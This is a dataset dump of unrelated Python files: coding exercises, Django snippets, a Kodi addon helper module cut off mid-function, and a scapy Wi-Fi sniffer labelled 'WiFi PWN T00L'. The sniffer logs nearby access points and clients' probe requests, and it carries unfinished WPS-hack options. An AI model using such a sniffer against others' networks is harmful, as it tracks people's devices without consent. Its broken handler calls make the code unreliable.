# ex: /testbot/
path('', views.index, name='index'),
path('examples/', views.examples, name='examples'),
path('test/', views.test, name='test'),
] | [
"[email protected]"
]
| |
5cac8cdc56b579d7b87c1b9d6a558ed496f54f49 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /7QPHWACcDihT3AM6b_6.py | 42998e86441fe6f7df22cf74314d844cef6aab32 | []
| no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | """
You are given an input array of bigrams, and an array of words.
Write a function that returns `True` if **every single bigram** from this
array can be found at least **once** in an array of words.
### Examples
can_find(["at", "be", "th", "au"], ["beautiful", "the", "hat"]) ➞ True
can_find(["ay", "be", "ta", "cu"], ["maybe", "beta", "abet", "course"]) ➞ False
# "cu" does not exist in any of the words.
can_find(["th", "fo", "ma", "or"], ["the", "many", "for", "forest"]) ➞ True
can_find(["oo", "mi", "ki", "la"], ["milk", "chocolate", "cooks"]) ➞ False
### Notes
* A **bigram** is string of two consecutive characters in the same word.
* If the list of words is empty, return `False`.
"""
def can_find(bigrams, words):
for bi in bigrams:
if bi not in ''.join(words):
return False
return True
| [
"[email protected]"
]
| |
a53d180b2d0604cbcd6624d4c8f734141673ae1d | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/fd662cf898124b46b21e2ca30d117042.py | 6281c95b5842337f10d96aec50200b80c8cd2e1d | []
| no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 346 | py | def hey(input):
has_alpha = False
has_num = False
for i in input:
if i.isalpha():
has_alpha = True
elif i.isnumeric():
has_num = True
if not has_alpha and not has_num:
return "Fine. Be that way!"
if input.upper() == input and has_alpha:
return "Whoa, chill out!"
if input[-1] == "?":
return "Sure."
return "Whatever."
| [
"[email protected]"
]
| |
cd9d8b0b39e0e09d7940516635e9a94f971f38fc | 7f4886802e83352f37d35509b7775c93c2756105 | /accounts/forms.py | db5c1f9a162a945c87a84c42d50cf009988f7614 | []
| no_license | JihyeKim0923/lion10 | c23a019c3725de2d9f70556993db1ed3e8d6ae2e | 2b76dc9290bec6f4d827a625b2f0b1e92c85ed53 | refs/heads/master | 2020-06-19T02:56:24.746341 | 2019-07-11T15:40:17 | 2019-07-11T15:40:17 | 196,539,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django import forms
class CreateUserForm(UserCreationForm):
email=forms.EmailField(required=True)
nickname=forms.CharField(required=True)
class Meta:
model=User
fields=("username","email","nickname","password1","password2")
def save(self, commit=True):
user=super(CreateUserForm,self).save(commit=False)
user.nickname=self.cleaned_data["nickname"]
user.email=self.cleaned_data["email"]
if commit:
user.save()
return user | [
"[email protected]"
]
| |
369d942517debc6f30b559509854cb06ba1ef9e5 | 27d0ea837489f68978287e369b60faa57eeb2497 | /examples/wifiz.py | 9044f15d865520323e139912c9568d0c8210365d | []
| no_license | nimdavtanke/wifi-scripts | 9692a4c67d23cc1a7d076d6a41be2bdd6cf4d3ce | 83576bcbf62cdfe020b5c2178f9ab177733de1dc | refs/heads/master | 2016-08-06T15:20:47.206467 | 2015-03-28T08:37:16 | 2015-03-28T08:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,227 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# 802.11 sniffer/wpsig/wpspin/reaver
# Credits go to:
#
# Craig Heffner Tactical Network Solutions
# https://github.com/devttys0/wps
#
# WPSIG [[email protected], [email protected]]
__author__ = '090h'
__license__ = 'GPL'
from sys import argv, exit
from os import path, geteuid
# import logging
# logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# from scapy.all import conf
# conf.verb = 1
# conf.use_pcap = True
# conf.use_dnet = False
from scapy.layers.dot11 import *
from scapy.all import *
# impacket
try:
from impacket import dot11
from impacket.dot11 import Dot11
from impacket.dot11 import Dot11Types
from impacket.dot11 import Dot11ManagementFrame
from impacket.dot11 import Dot11ManagementProbeRequest
from impacket.ImpactDecoder import RadioTapDecoder
except ImportError:
Exception("impacket")
from pprint import pprint
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
if LINUX:
# print('Linux detected. Trying to import PyLorcon2...')
try:
import PyLorcon2
except ImportError:
logging.warning('PyLorcon2 import failed. Injection is not available.')
if WINDOWS:
logging.error('Sorry, no Windows.')
exit(-1)
if DARWIN:
logging.warning('OS X detected. Only pasive mode will be available')
#TODO: add iOS and Android detection
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
class WiFiWizard(object):
def __init__(self, iface, output=None, whitelist=None, verbose=False):
# Replace this with your phone's MAC address
if not whitelist: whitelist = ['00:00:00:00:00:00', ]
self.iface = iface
self.whitelist = whitelist
self.verbose = verbose
self.aps = {}
self.clients = {}
# Probe requests from clients
def handle_probe(self, pkt):
if pkt.haslayer(Dot11ProbeReq) and '\x00' not in pkt[Dot11ProbeReq].info:
essid = pkt[Dot11ProbeReq].info
else:
essid = 'Hidden SSID'
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist:
#TODO: add logging
return
# New client
if client not in self.clients:
self.clients[client] = []
print('[!] New client: %s ' % client)
if essid not in self.clients[client]:
self.clients[client].append(essid)
print('[+] New ProbeRequest: from %s to %s' % (client, essid))
def handle_beacon(self, pkt):
if not pkt.haslayer(Dot11Elt):
return
# Check to see if it's a hidden SSID
essid = pkt[Dot11Elt].info if '\x00' not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pkt[Dot11].addr3
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist or bssid in self.whitelist:
#TODO: add logging
return
try:
channel = int(ord(pkt[Dot11Elt:3].info))
except:
channel = 0
try:
extra = pkt.notdecoded
rssi = -(256-ord(extra[-4:-3]))
except:
rssi = -100
p = pkt[Dot11Elt]
capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}"
"{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
# print('capability = %s' % capability)
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
crypto.add("WPA")
p = p.payload
if not crypto:
if 'privacy' in capability:
crypto.add("WEP")
else:
crypto.add("OPN")
enc = '/'.join(crypto)
if bssid not in self.aps:
self.aps[bssid] = (channel, essid, bssid, enc, rssi)
print "[+] New AP {0:5}\t{1:20}\t{2:20}\t{3:5}\t{4:4}".format(channel, essid, bssid, enc, rssi)
def pkt_handler(self, pkt):
# wlan.fc.type == 0 Management frames
# wlan.fc.type == 1 Control frames
# wlan.fc.type == 2 Data frames
# wlan.fc.type_subtype == 0 Association request
# wlan.fc.type_subtype == 1 Association response
# wlan.fc.type_subtype == 2 Reassociation request
# wlan.fc.type_subtype == 3 Reassociation response
# wlan.fc.type_subtype == 4 Probe request
# wlan.fc.type_subtype == 5 Probe response
# wlan.fc.type_subtype == 8 Beacon
try:
print('-->', pkt.name)
except:
pass
#Beacon
if pkt.haslayer(Dot11Beacon):
self.handle_beacon(pkt)
# Client ProbeReq
if pkt.haslayer(Dot11ProbeReq):
self.handle_request(pkt)
# if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
if pkt.haslayer(Dot11ProbeResp):
self.handle_response(pkt)
def sniff(self):
'''
Sniff Beacon and Probe Requst/Response frames to extract AP info
:param count: packets to capture, 0 = loop
:return:
'''
print('Press Ctrl-C to stop sniffing.')
sniff(iface=self.iface,
prn=self.pkt_handler,
lfilter=lambda p: p.haslayer(Dot11))
if __name__ == '__main__':
parser = ArgumentParser(description='WiFi PWN T00L', formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
parser.add_argument('interface', help='802.11 interface to use')
parser.add_argument('-c', '--channel', required=False)
parser.add_argument('-w', '--wps', required=False, action='store_true', help='wps hack')
parser.add_argument('-a', '--active', required=False, action='store_true', help='active mode')
args = parser.parse_args()
if geteuid() != 0:
exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'.")
WiFiWizard(args.interface).sniff()
| [
"[email protected]"
]
| |
4a5c5376aa7ce609fdb64cecfb2774f44dbc8725 | cf0480eb13906bf6e2c46bfe09b864ee9bbf6776 | /Functions/Calc/Calc_1.py | 3b600966f2c62976f2522ee032f37f2d17a06b1c | []
| no_license | ravi4all/Python_JuneRegular_Evening | f7afb665541b88a9cb6ce89a488a32120f63dd6b | ad6e17c4acdcb2c669ba0508b12aeca8bdab8976 | refs/heads/master | 2020-03-20T21:20:36.763561 | 2018-07-06T11:26:52 | 2018-07-06T11:26:52 | 137,736,114 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | print("""
1. Add
2. Sub
3. Mul
4. Div
""")
user_choice = input("Enter your choice : ")
num_1 = int(input("Enter first number : "))
num_2 = int(input("Enter second number : "))
if user_choice == "1":
result = num_1 + num_2
print("Sum is",result)
elif user_choice == "2":
result = num_1 - num_2
print("Diff is", result)
| [
"[email protected]"
]
| |
f3ed0316d367ac2d8180e59a9ef4e265df2eb72b | d78dfc5089717fc242bbd7097f507d811abb4260 | /French/plugin.video.fr.filmsdefrance/streamcomplet_common.py | 01bb111cb943894548d6f78bf38f215525777056 | []
| no_license | tustxk/AddOnRepo | 995b980a9ec737e2c25bed423fc83f710c697e40 | 6b86a06cb37e6e10b4119584dd7311ebc2318e54 | refs/heads/master | 2022-10-08T21:34:34.632346 | 2016-10-28T09:48:01 | 2016-10-28T09:48:01 | 70,684,775 | 1 | 1 | null | 2022-10-01T16:27:13 | 2016-10-12T09:31:16 | Python | UTF-8 | Python | false | false | 69,201 | py | ### ############################################################################################################
### #
### # Author: # The Highway
### # Description: # Common File
### #
### ############################################################################################################
### ############################################################################################################
### Imports ###
import xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs
import os,sys,string,StringIO,logging,random,array,time,datetime,re
import urllib,urllib2,htmllib
from streamcomplet_config import *
#import urlresolver
#import copy
#try: import json
#except ImportError: import simplejson as json
#try: import StorageServer
#except: import storageserverdummy as StorageServer
#cache = StorageServer.StorageServer(plugin_id)
try: from addon.common.net import Net
except:
try: from t0mm0.common.net import Net
except:
try: from c_t0mm0_common_net import Net
except: pass
try: from addon.common.addon import Addon
except:
try: from t0mm0.common.addon import Addon
except:
try: from c_t0mm0_common_addon import Addon
except: pass
#try: from sqlite3 import dbapi2 as sqlite; print "Loading sqlite3 as DB engine"
#except: from pysqlite2 import dbapi2 as sqlite; print "Loading pysqlite2 as DB engine"
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import cHiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
UsedLanguages=ps('UsedLanguages');
### ############################################################################################################
__plugin__=ps('__plugin__'); __authors__=ps('__authors__'); __credits__=ps('__credits__');
### ############################################################################################################
##### Addon / Plugin Basic Setup #####
_addon_id=ps('_addon_id'); _plugin_id=ps('_addon_id');
_addon=Addon(ps('_addon_id'), sys.argv); addon=_addon;
_plugin=xbmcaddon.Addon(id=ps('_addon_id'));
try:
try: import StorageServer as StorageServer
except:
try: import c_StorageServer as StorageServer
except:
try: import storageserverdummy as StorageServer
except:
try: import c_storageserverdummy as StorageServer
except: pass
cache=StorageServer.StorageServer(ps('_addon_id'))
except: pass
##### Paths #####
#_database_name=ps('_database_name')
#_database_file=os.path.join(xbmc.translatePath("special://database"),ps('_database_name')+'.db');
#DB=_database_file;
_domain_url=ps('_domain_url'); _du=ps('_domain_url');
_addonPath =xbmc.translatePath(_plugin.getAddonInfo('path'))
_artPath =xbmc.translatePath(os.path.join(_addonPath,ps('_addon_path_art')))
_datapath =xbmc.translatePath(_addon.get_profile());
_artIcon =_addon.get_icon();
_artFanart =_addon.get_fanart()
##### Important Functions with some dependencies #####
def addstv(id,value=''): _addon.addon.setSetting(id=id,value=value) ## Save Settings
def addst(r,s=''): return _addon.get_setting(r) ## Get Settings
def addpr(r,s=''): return _addon.queries.get(r,s) ## Get Params
def tfalse(r,d=False): ## Get True / False
if (r.lower()=='true' ) or (r.lower()=='t') or (r.lower()=='y') or (r.lower()=='1') or (r.lower()=='yes'): return True
elif (r.lower()=='false') or (r.lower()=='f') or (r.lower()=='n') or (r.lower()=='0') or (r.lower()=='no'): return False
else: return d
def tfalse_old(r,d=False): ## Get True / False
if (r.lower()=='true' ): return True
elif (r.lower()=='false'): return False
else: return d
def art(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,f+fe)) ### for Making path+filename+ext data for Art Images. ###
def artp(f,fe='.png'): return art(f,fe)
def artj(f,fe='.jpg'): return art(f,fe)
def ROart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def ROartp(f,fe='.png'): return ROart(f,fe)
def ROartj(f,fe='.jpg'): return ROart(f,fe)
def FRart(f,fe=''): return xbmc.translatePath(os.path.join(_artPath,'fr',f+fe)) ### for Making path+filename+ext data for Art Images. ###
def FRartp(f,fe='.png'): return ROart(f,fe)
def FRartj(f,fe='.jpg'): return ROart(f,fe)
##### Settings #####
_setting={};
_setting['enableMeta'] = _enableMeta =tfalse(addst("enableMeta"))
_setting['debug-enable']= _debugging =tfalse(addst("debug-enable"));
_setting['debug-show'] = _shoDebugging =tfalse(addst("debug-show"))
debugging=_debugging
##### Variables #####
_default_section_=ps('default_section');
net=Net();
BASE_URL=ps('_domain_url');
### ############################################################################################################
### ############################################################################################################
def eod(): _addon.end_of_directory()
def notification(header="", message="", sleep=5000 ): xbmc.executebuiltin( "XBMC.Notification(%s,%s,%i)" % ( header, message, sleep ) )
def myNote(header='',msg='',delay=5000,image='http://upload.wikimedia.org/wikipedia/commons/thumb/a/a5/US_99_%281961%29.svg/40px-US_99_%281961%29.svg.png'): _addon.show_small_popup(title=header,msg=msg,delay=delay,image=image)
def cFL( t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t+'[/COLOR]' ### For Coloring Text ###
def cFL_(t,c=ps('default_cFL_color')): return '[COLOR '+c+']'+t[0:1]+'[/COLOR]'+t[1:] ### For Coloring Text (First Letter-Only) ###
def WhereAmI(t): ### for Writing Location Data to log file ###
if (_debugging==True): print 'Where am I: '+t
def deb(s,t): ### for Writing Debug Data to log file ###
if (_debugging==True): print s+': '+t
def debob(t): ### for Writing Debug Object to log file ###
if (_debugging==True): print t
def nolines(t):
it=t.splitlines(); t=''
for L in it: t=t+L
t=((t.replace("\r","")).replace("\n",""))
return t
def isPath(path): return os.path.exists(path)
def isFile(filename): return os.path.isfile(filename)
def getFileExtension(filename):
ext_pos = filename.rfind('.')
if ext_pos != -1: return filename[ext_pos+1:]
else: return ''
def get_immediate_subdirectories(directory):
return [name for name in os.listdir(directory) if os.path.isdir(os.path.join(directory, name))]
def findInSubdirectory(filename, subdirectory=''):
if subdirectory: path = subdirectory
else: path = _addonPath
for root, _, names in os.walk(path):
if filename in names: return os.path.join(root, filename)
raise 'File not found'
def get_xbmc_os():
try: xbmc_os = os.environ.get('OS')
except: xbmc_os = "unknown"
return xbmc_os
def get_xbmc_version():
rev_re = re.compile('r(\d+)')
try: xbmc_version = xbmc.getInfoLabel('System.BuildVersion')
except: xbmc_version = 'Unknown'
return xbmc_version
def get_xbmc_revision():
rev_re = re.compile('r(\d+)')
try: xbmc_version = xbmc.getInfoLabel('System.BuildVersion')
except: xbmc_version = 'Unknown'
try: xbmc_rev=int(rev_re.search(xbmc_version).group(1)); deb("addoncompat.py: XBMC Revision",xbmc_rev)
except: xbmc_rev=0; deb("addoncompat.py: XBMC Revision not available - Version String",xbmc_version)
return xbmc_rev
def _SaveFile(path,data):
file=open(path,'w')
file.write(data)
file.close()
def _OpenFile(path):
deb('File',path)
if os.path.isfile(path): ## File found.
deb('Found',path)
file = open(path, 'r')
contents=file.read()
file.close()
return contents
else: return '' ## File not found.
def _CreateDirectory(dir_path):
dir_path = dir_path.strip()
if not os.path.exists(dir_path): os.makedirs(dir_path)
def _get_dir(mypath, dirname): #...creates sub-directories if they are not found.
subpath = os.path.join(mypath, dirname)
if not os.path.exists(subpath): os.makedirs(subpath)
return subpath
def askSelection(option_list=[],txtHeader=''):
if (option_list==[]):
debob('askSelection() >> option_list is empty')
return None
dialogSelect = xbmcgui.Dialog();
index=dialogSelect.select(txtHeader, option_list)
return index
def iFL(t): return '[I]'+t+'[/I]' ### For Italic Text ###
def bFL(t): return '[B]'+t+'[/B]' ### For Bold Text ###
def _FL(t,c,e=''): ### For Custom Text Tags ###
if (e==''): d=''
else: d=' '+e
return '['+c.upper()+d+']'+t+'[/'+c.upper()+']'
def aSortMeth(sM,h=int(sys.argv[1])):
xbmcplugin.addSortMethod(handle=h, sortMethod=sM)
def set_view(content='none',view_mode=50,do_sort=False):
deb('content type: ',str(content))
deb('view mode: ',str(view_mode))
h=int(sys.argv[1])
if (content is not 'none'): xbmcplugin.setContent(h, content)
if (tfalse(addst("auto-view"))==True): xbmc.executebuiltin("Container.SetViewMode(%s)" % str(view_mode))
def showkeyboard(txtMessage="",txtHeader="",passwordField=False):
if txtMessage=='None': txtMessage=''
keyboard = xbmc.Keyboard(txtMessage, txtHeader, passwordField)#("text to show","header text", True="password field"/False="show text")
keyboard.doModal()
if keyboard.isConfirmed():
return keyboard.getText()
else:
return False # return ''
def ParseDescription(plot): ## Cleans up the dumb number stuff thats ugly.
if ("&" in plot): plot=plot.replace('&' ,'&')#&#x27;
if (" " in plot): plot=plot.replace(' ' ," ")
if ("’" in plot): plot=plot.replace('’' ,"'")
if ("–" in plot): plot=plot.replace("–","-") #unknown
if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
#if addst('my-language','French').lower()=='French':
if ('&#' in plot) and (';' in plot):
if ("–" in plot): plot=plot.replace("–","-") #unknown
if ("‘" in plot): plot=plot.replace("‘","'")
if ("’" in plot): plot=plot.replace("’","'")
if ("“" in plot): plot=plot.replace('“','"')
if ("”" in plot): plot=plot.replace('”','"')
if ("×" in plot): plot=plot.replace('×' ,'x')
if ("'" in plot): plot=plot.replace(''' ,"'")
if ("ô" in plot): plot=plot.replace('ô' ,"o")
if ("·" in plot): plot=plot.replace('·' ,"-")
if ("û" in plot): plot=plot.replace('û' ,"u")
if ("à" in plot): plot=plot.replace('à' ,"a")
if ("ƥ" in plot): plot=plot.replace('ƥ',"")
if ("é" in plot): plot=plot.replace('é' ,"e")
if ("â" in plot): plot=plot.replace('â' ,"a")
if ("&" in plot): plot=plot.replace('&' ,"&")
#if ("a" in plot): plot=plot.replace('a' ,"a")
##if (chr(239) in plot): plot=plot.replace(chr(239) ,"'")
#zz=[[u'\xe2','a']] #[[196,'a'],[196,'a'],[196,'a'],[196,'a'],[196,'a']]
#for c1,c2 in zz:
# if (chr(c1) in plot): plot=plot.replace(chr(c1) ,c2)
##plot=plot.replace(chr('0x92'),"'")
if ('&#' in plot) and (';' in plot):
try: matches=re.compile('&#(.+?);').findall(plot)
except: matches=''
if (matches is not ''):
for match in matches:
if (match is not '') and (match is not ' ') and ("&#"+match+";" in plot):
try: plot=plot.replace("&#"+match+";" ,"")
#try: plot=plot.replace("&#"+match+";" ,""+match)
except: pass
try: matches=re.compile('\\x([0-9a-zA-Z][0-9a-zA-Z])').findall(plot)
except: matches=''
#if (matches is not ''):
# for match in matches:
# if (match is not '') and (match is not ' ') and ("\\x"+match+"" in plot):
# try: plot=plot.replace("\\x"+match+"","")
# #try: plot=plot.replace("\\x"+match+"",""+match)
# except: pass
#if ("\xb7" in plot): plot=plot.replace('\xb7' ,"-")
#if ('&#' in plot) and (';' in plot): plot=unescape_(plot)
for i in xrange(127,256):
try: plot=plot.replace(chr(i),"")
except: pass
return plot
def unescape_(s):
p = htmllib.HTMLParser(None)
p.save_bgn()
p.feed(s)
return p.save_end()
def messupText(t,_html=False,_ende=False,_a=False,Slashes=False):
if (_html==True):
try: t=HTMLParser.HTMLParser().unescape(t)
except: pass
try: t=ParseDescription(t)
except: pass
if (_ende==True):
try:
if addst('my-language',UsedLanguages[1]).lower()==UsedLanguages[1].lower():
#if not addst('my-language','French').lower()=='French':
t=t.encode('utf8');
#t=t.encode('utf8','ignore');
#t=t.encode('ascii','ignore');
#t=t.decode('iso-8859-1')
else:
#t=t.encode('utf8','ignore'); t=t.decode('cp1250')
#t=t.encode('utf8'); t=t.decode('cp1250')
#t=t.encode('ascii','ignore'); t=t.decode('iso-8859-1')
#t=unicodedata.normalize('NFKD', unicode(t)).encode('ascii','ignore')
#t=t.encode('ascii','ignore'); t=t.decode('cp1250')
#t=t.encode('ascii','replace'); t=t.decode('cp1250')
#t=t.encode('ascii','strict'); t=t.decode('cp1250')
#t=t.encode('ascii','xmlcharrefreplace'); t=t.decode('cp1250')
#t=t.decode('cp1250')
t=t.encode('utf8');
#t=t.encode('utf8','ignore');
#t=t
except: pass
if (_a==True):
try: t=_addon.decode(t); t=_addon.unescape(t)
except: pass
if (Slashes==True):
try: t=t.replace( '_',' ')
except: pass
#t=t.replace("text:u","")
return t
def nURL(url,method='get',form_data={},headers={},html='',proxy='',User_Agent='',cookie_file='',load_cookie=False,save_cookie=False):
if url=='': return ''
dhtml=''+html
if len(User_Agent) > 0: net.set_user_agent(User_Agent)
else: net.set_user_agent(ps('User-Agent'))
if len(proxy) > 9: net.set_proxy(proxy)
if (len(cookie_file) > 0) and (load_cookie==True): net.set_cookies(cookie_file)
if method.lower()=='get':
try: html=net.http_GET(url,headers=headers).content
except: html=dhtml
elif method.lower()=='post':
try: html=net.http_POST(url,form_data=form_data,headers=headers).content #,compression=False
except: html=dhtml
elif method.lower()=='head':
try: html=net.http_HEAD(url,headers=headers).content
except: html=dhtml
if (len(html) > 0) and (len(cookie_file) > 0) and (save_cookie==True): net.save_cookies(cookie_file)
if 'Website is offline' in html: popOK(msg="Website is offline",title=ps('__plugin__'),line2="Site Web est deconnecte",line3="")
elif 'Erreur de la base de donn' in html: popOK(msg="Error Database",title=ps('__plugin__'),line2="Erreur de la base de donnees",line3="")
return html
def BusyAnimationShow(): xbmc.executebuiltin('ActivateWindow(busydialog)')
def BusyAnimationHide(): xbmc.executebuiltin('Dialog.Close(busydialog,true)')
def closeAllDialogs(): xbmc.executebuiltin('Dialog.Close(all, true)')
def popYN(title='',line1='',line2='',line3='',n='',y=''):
diag=xbmcgui.Dialog()
r=diag.yesno(title,line1,line2,line3,n,y)
if r: return r
else: return False
#del diag
def popOK(msg="",title="",line2="",line3=""):
dialog=xbmcgui.Dialog()
#ok=dialog.ok(title, msg, line2, line3)
dialog.ok(title, msg, line2, line3)
def spAfterSplit(t,ss):
if ss in t: t=t.split(ss)[1]
return t
def spBeforeSplit(t,ss):
if ss in t: t=t.split(ss)[0]
return t
def TP(s): return xbmc.translatePath(s)
def TPap(s,fe='.py'): return xbmc.translatePath(os.path.join(_addonPath,s+fe))
def CopyAFile(tFrom,tTo):
try:
import shutil
shutil.copy(tFrom,tTo)
except: pass
def checkHostProblems(url,b=False,t=True):
if ('embed.yourupload.com/' in url) or ('novamov.com/' in url) or ('veevr.com/' in url): b=t
#if 'embed.yourupload.com/' in url: b=t
#elif 'novamov.com/' in url: b=t
return b
### #Metahandler
#try: from script.module.metahandler import metahandlers
#except: from metahandler import metahandlers
#grab=metahandlers.MetaData(preparezip=False)
#def GRABMETA(name,types):
# type=types
# EnableMeta=tfalse(addst("enableMeta"))
# if (EnableMeta==True):
# if ('movie' in type):
# ### grab.get_meta(media_type, name, imdb_id='', tmdb_id='', year='', overlay=6)
# meta=grab.get_meta('movie',name,'',None,None,overlay=6)
# infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year'],'votes': meta['votes'],'tagline': meta['tagline'],'premiered': meta['premiered'],'trailer_url': meta['trailer_url'],'studio': meta['studio'],'imdb_id': meta['imdb_id'],'thumb_url': meta['thumb_url']}
# #infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop_url': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year']}
# elif ('tvshow' in type):
# meta=grab.get_meta('tvshow',name,'','',None,overlay=6)
# #print meta
# infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status'],'premiered': meta['premiered'],'imdb_id': meta['imdb_id'],'tvdb_id': meta['tvdb_id'],'year': meta['year'],'imgs_prepacked': meta['imgs_prepacked'],'overlay': meta['overlay'],'duration': meta['duration']}
# #infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status']}
# else: infoLabels={}
# else: infoLabels={}
# return infoLabels
def MetaGrab(media_type,meta_name,imdb_id='',tmdb_id='',year='',season='',episode=''):
default_infoLabels={'overlay':6,'title':meta_name,'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'trailer_url':'','trailer':'','TVShowTitle':meta_name,'backdrop_url':_artFanart,'banner_url':''}
try: from metahandler import metahandlers
except: debob("filed to import metahandler"); return default_infoLabels
grab=metahandlers.MetaData(preparezip=False)
try: EnableMeta=tfalse(addst("enableMeta"))
except: EnableMeta=True
if (EnableMeta==True):
if ('movie' in media_type) or (media_type=='m'):
infoLabels=grab.get_meta("movie",meta_name,imdb_id=imdb_id,tmdb_id=tmdb_id,year=year)
elif ('tvshow' in media_type) or (media_type=='t'):
infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
elif ('episode' in media_type) or (media_type=='e'):
if len(imdb_id)==0:
t_infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
imdb_id=t_infoLabels['imdb_id']
try:
iseason=int(season)
iepisode=int(episode)
infoLabels=grab.get_episode_meta(tvshowtitle=meta_name,imdb_id=tv_meta['imdb_id'],season=iseason,episode=iepisode)
except: infoLabels={'overlay':6,'title':str(season)+'x'+str(episode),'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'TVShowTitle':meta_name}
else: infoLabels=default_infoLabels
#
else: infoLabels=default_infoLabels
return infoLabels
#
### ############################################################################################################
class TextBox2: ## Usage Example: TextBox_FromUrl().load('https://raw.github.com/HIGHWAY99/plugin.video.theanimehighway/master/README.md')
WINDOW = 10147; CONTROL_LABEL = 1; CONTROL_TEXTBOX = 5; HEADER_MESSAGE = "%s - ( v%s )" % (__plugin__,addon.get_version()) # set heading
def load_url(self, URL_PATH, HEADER_MESSAGE2=''):
deb('text window from url: ',URL_PATH) #self.URL_PATH
try: text=nURL(URL_PATH)#(self.URL_PATH)
except: text=''
self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
def load_file(self, FILE_NAME='changelog.txt', HEADER_MESSAGE2='', FILE_PATH=_addonPath):
txt_path = os.path.join(FILE_PATH,FILE_NAME)
deb('text window from file: ',txt_path)
f = open(txt_path)
text = f.read()
self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
def load_string(self, text_string='', HEADER_MESSAGE2=''):
self.load_window(); xbmc.sleep(20); self.set_header(HEADER_MESSAGE2); self.set_text(text_string)
def load_window(self, sleeptime=500):
xbmc.executebuiltin("ActivateWindow(%d)" % ( self.WINDOW, )) # activate the text viewer window
self.win = xbmcgui.Window(self.WINDOW) # get window
xbmc.sleep(sleeptime) # give window time to initialize
def set_header(self, HEADER_MESSAGE2=''):
if (HEADER_MESSAGE2==''): HEADER_MESSAGE2=self.HEADER_MESSAGE
self.win.getControl(self.CONTROL_LABEL).setLabel(HEADER_MESSAGE2)
def set_text(self, text=''):
self.win.getControl(self.CONTROL_TEXTBOX).setText(text)
def RefreshList(): xbmc.executebuiltin("XBMC.Container.Refresh")
def String2TextBox(message='',HeaderMessage=''): TextBox2().load_string(message,HeaderMessage); #RefreshList()
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
##### Player Functions #####
def PlayItCustomL(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
